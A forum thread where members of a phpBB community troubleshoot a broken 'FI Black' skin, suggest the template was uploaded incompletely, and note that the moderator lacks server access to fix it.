FI Black Skin?

Hey Mike, is the FI Black skin fixed yet? Last time I switched to it nothing would work on the Forum. I am really wanting to switch up but I don't want to take the risk and have to have you reset it again.

Any chance of taking it out of the list? I remember getting screwed when I set it to FI Black.

Yeah I agree, new members will most likely want a Dark skin & switch.

But um Mike, it's pretty simple to run the skins, I was playing around with a Forum (that I made for fun) on this same server (phpBB)....all you have to do is go into the skins section & choose one of their premade temps & give it a name.

Everyone tries to use FI Black and gets screwed up as a result. I remember I did.

Here's an idea. How about we remove it and try another skin instead. But we get someone who's experienced in editing forum skins and try and make it.....eh...different. How's that sound?

phpBB skins are really easy to get and instal. Modifying them can be really simple or really hard, and I doubt Mike's up for that.

For a demo of what different styles can do, check this out.

This would be helpful if it weren't for Mike not having access to the server itself, that PHPBB is hosted on here. (Hence why it took so long to remedy when the forum got attacked not too long ago.)

PHPBB isn't a "server", it's bulletin board software. A server is the web module used to host it on the web. (Like Apache, Lighttpd, etc.)

The person goes by the screen name "Schuby" (note the url), and he is the owner of the webspace this forum uses. (Whether or not he owns the server this forum software is on is still up in the air.)

Anyway, he owns the site and space, and runs this forum on it. Apparently he's also -extremely- difficult to get ahold of, too.

Now as far as the template problem, I don't have any screen shots but I am familiar enough with this software to know that when the forum was installed, someone (Schuby most likely) tried to install the template but did it incorrectly, and so it's not really recognized by PHPBB, and it can't find the theme information needed to generate the forum pages, and so when you switch to the theme it just shows an error, and you can't do anything about it.
Mike himself can't do anything more than go and fix a users account who switches themes, either.

True, it probably displays that debug error, "can't connect to fi black... whatever config file is missing". The best, easiet thing to do is to reinstall the template, remove it from the styles admin cp (I think that's what its called) and install it again. Which Mike probably already tried, so most likely when Schuby uploaded the template folder onto his server everything didn't get uploaded. Maybe the .css or any .tpl file. None of it like you said is anything serious, but impossible to fix since no one can get in contact with him. If anyone ever does get in touch with Schuby, tell him to install this hack. It's the extreme styles hack, it lets you edit all the php files that are under your forum root from the admin cp.

If Mike had server access, he could do that sort of thing. However, I had a rather lengthy discussion with him a few weeks ago about that, and various other forum related things to better manage it, and if I am remembering correctly he explained that this is Schuby's site so he wasn't going to try to get anything of said nature installed, nor could he do it himself.
So suggesting hacks is rather redundant at this point.
